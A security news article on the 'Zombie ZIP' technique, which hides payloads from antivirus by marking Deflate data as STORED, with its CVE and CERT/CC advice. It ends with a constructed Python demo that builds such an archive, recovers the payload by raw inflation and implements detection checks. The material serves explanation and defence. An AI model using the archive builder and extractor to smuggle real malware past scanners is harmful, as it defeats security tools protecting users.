Zombie ZIP lets you hide malware in archives

✨ Megiddo

Security researcher Chris Aziz of Bombadil Systems has developed and demonstrated an attack technique called Zombie ZIP, which hides malicious payloads inside ZIP archives in a way that antivirus and EDR scanners fail to detect.

The technique works by manipulating the ZIP file headers. The compression method field of an entry is set to 0 (STORED), which declares the entry's data to be uncompressed, while the bytes that follow the header are in fact a Deflate-compressed stream. A scanner that trusts the header treats those bytes as the raw file and looks for signatures in them, but all it sees is compressed "noise" in which no signature matches.

Standard utilities such as WinRAR, 7-Zip and unzip report an error or extract corrupted data when they unpack such an archive. Because the method field says STORED, they copy the entry's bytes out verbatim, and the result fails the integrity check: the CRC-32 recorded in the archive was computed over the real, decompressed payload, not over the Deflate stream. A purpose-built downloader that ignores the method field and inflates the bytes as Deflate, however, recovers the hidden payload without difficulty.

Aziz has published a proof-of-concept (PoC) on GitHub, including sample archives and a detailed description of the method. CERT/CC has issued an advisory on the technique. The issue has been assigned the identifier CVE-2026-0866, and experts note that it resembles CVE-2004-0935, a vulnerability discovered more than 20 years ago in an early version of ESET antivirus.

The experts also stress that some decompression tools nevertheless extract such "zombie archives" correctly, which is what lets the payload reach a system whose scanner never inspected it.

CERT/CC recommends that vendors of security products validate the compression method field against the actual data, detect inconsistencies in the archive structure (for example a STORED entry whose compressed and uncompressed sizes differ, or whose bytes do not match the recorded CRC-32), and offer more aggressive scanning modes. Users are advised to treat archives from unknown sources with caution and to delete any archive that produces an "unsupported method" error during extraction.
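The following constructed example ties together the header manipulation described above, the reason stock tools fail on it, and the consistency checks CERT/CC calls for. It is added here for illustration and is not Aziz's PoC or any vendor's code: it builds an ordinary single-entry Deflate archive with Python's zipfile module, flips the method field to 0 (STORED) in the local file header and the central directory while leaving the Deflate bytes, sizes and plaintext CRC-32 in place, then shows what a header-trusting reader gets, what zipfile itself does, how a raw-inflate reader recovers the payload, and which structural inconsistencies give the entry away. The payload, entry name and check wording are assumptions made for the demo.

```python
"""Constructed demo: a 'zombie' ZIP entry (method=0 but Deflate data),
what header-trusting code sees, how a raw-inflate reader recovers the
payload, and the consistency checks CERT/CC-style advice calls for."""
import io
import struct
import zipfile
import zlib

# Constructed sample payload; repetitive so Deflate actually shrinks it.
PAYLOAD = b"echo 'constructed zombie payload'\n" * 40
NAME = "payload.sh"                     # assumed entry name for the demo
STORED, DEFLATED = 0, 8                 # ZIP compression method codes
LFH_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x05\x06"


def make_zip(name: str, data: bytes, method: int = DEFLATED, zombie: bool = False) -> bytes:
    """Write a single-entry archive. With zombie=True (meaningful for a Deflate
    archive), flip the method field to STORED in both the local file header
    (offset 8) and the central directory header (offset 10), leaving the
    Deflate bytes, the CRC-32 of the plaintext and both size fields untouched."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", method) as zf:
        zf.writestr(name, data)
    raw = bytearray(buf.getvalue())
    if zombie:
        struct.pack_into("<H", raw, 8, STORED)            # LFH sits at offset 0
        eocd = raw.rfind(EOCD_SIG)
        cd_off = struct.unpack_from("<I", raw, eocd + 16)[0]
        struct.pack_into("<H", raw, cd_off + 10, STORED)  # first central dir entry
    return bytes(raw)


def parse_first_entry(blob: bytes) -> dict:
    """Decode the 30-byte local file header at offset 0 and slice out the
    entry's bytes (compressed_size of them, as a naive reader would)."""
    (sig, _ver, flags, method, _time, _date,
     crc, csize, usize, nlen, xlen) = struct.unpack_from("<4sHHHHHIIIHH", blob, 0)
    if sig != LFH_SIG:
        raise ValueError("not a local file header")
    start = 30 + nlen + xlen
    return {"method": method, "flags": flags, "crc": crc,
            "csize": csize, "usize": usize, "data": blob[start:start + csize]}


def naive_stored_extract(entry: dict) -> tuple[bytes, bool]:
    """A header-trusting reader on a method-0 entry: copy bytes verbatim and
    check them against the recorded CRC. For a zombie entry the bytes are the
    Deflate stream (signature-free 'noise') and the CRC check fails."""
    data = entry["data"]
    return data, zlib.crc32(data) == entry["crc"]


def recover_payload(entry: dict) -> bytes:
    """The downloader's view: ignore the method field and inflate the bytes as
    a raw Deflate stream (wbits=-15: no zlib/gzip wrapper, as ZIP uses)."""
    return zlib.decompressobj(-15).decompress(entry["data"])


def stock_unzip(blob: bytes, name: str = NAME) -> str:
    """What Python's own zipfile does with the archive: 'ok' or the error."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            zf.read(name)
        return "ok"
    except zipfile.BadZipFile as exc:
        return f"BadZipFile: {exc}"


def zombie_findings(entry: dict) -> list[str]:
    """Validate the declared method against the data (constructed checks that
    follow the CERT/CC advice, not a vendor's implementation)."""
    findings = []
    if entry["method"] != STORED:
        return findings                 # only the STORED-but-Deflate case is modelled
    if entry["csize"] != entry["usize"]:
        findings.append("STORED entry but compressed size != uncompressed size")
    if zlib.crc32(entry["data"]) != entry["crc"]:
        findings.append("STORED entry whose bytes do not match the declared CRC-32")
    try:
        inflated = zlib.decompressobj(-15).decompress(entry["data"])
    except zlib.error:
        inflated = b""
    if inflated and zlib.crc32(inflated) == entry["crc"]:
        findings.append("STORED entry that inflates as Deflate to data matching the CRC-32")
    return findings


if __name__ == "__main__":
    zombie = make_zip(NAME, PAYLOAD, zombie=True)
    entry = parse_first_entry(zombie)
    raw, crc_ok = naive_stored_extract(entry)
    print("declared method:", entry["method"], "| sizes:", entry["csize"], entry["usize"])
    print("naive extract CRC ok:", crc_ok, "| looks like payload:", raw[:16] == PAYLOAD[:16])
    print("stock zipfile:", stock_unzip(zombie))
    print("raw inflate == payload:", recover_payload(entry) == PAYLOAD)
    for finding in zombie_findings(entry):
        print("finding:", finding)
```

The third check in zombie_findings is the decisive one: a legitimate STORED entry will never inflate as Deflate to bytes that reproduce the recorded CRC-32, whereas a zombie entry does, so the check confirms the mismatch rather than merely suspecting it. An ordinary Deflate archive and an ordinary STORED archive built with the same helper produce no findings, which is the false-positive control a scanner vendor would want before shipping such a rule.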